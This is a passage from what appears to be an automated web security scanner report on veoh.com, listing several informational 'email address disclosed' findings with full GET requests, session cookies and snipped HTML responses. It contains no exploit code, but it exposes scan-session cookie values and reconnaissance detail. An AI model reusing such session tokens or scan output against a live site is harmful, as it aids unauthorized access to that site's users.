Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 25399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.56. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The following email address was disclosed in the response:

Request

GET /publish/video HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.57. http://www.veoh.com/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /register

Issue detail

The following email address was disclosed in the response:

Request

GET /register HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 52657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.58. http://www.veoh.com/search/videos/q/-MENUVALUE-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The following email address was disclosed in the response:

Request

GET /search/videos/q/-MENUVALUE- HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:08 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 57062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.59. http://www.veoh.com/search/videos/q/publisher:bunny12344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The following email address was disclosed in the response:

Request

GET /search/videos/q/publisher:bunny12344 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=79
Content-Length: 72609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.60. http://www.veoh.com/support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /support.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support.html HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 24001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.61. http://www.veoh.com/users/JDFox5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/JDFox5

Issue detail

The following email address was disclosed in the response:

Request

GET /users/JDFox5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySettin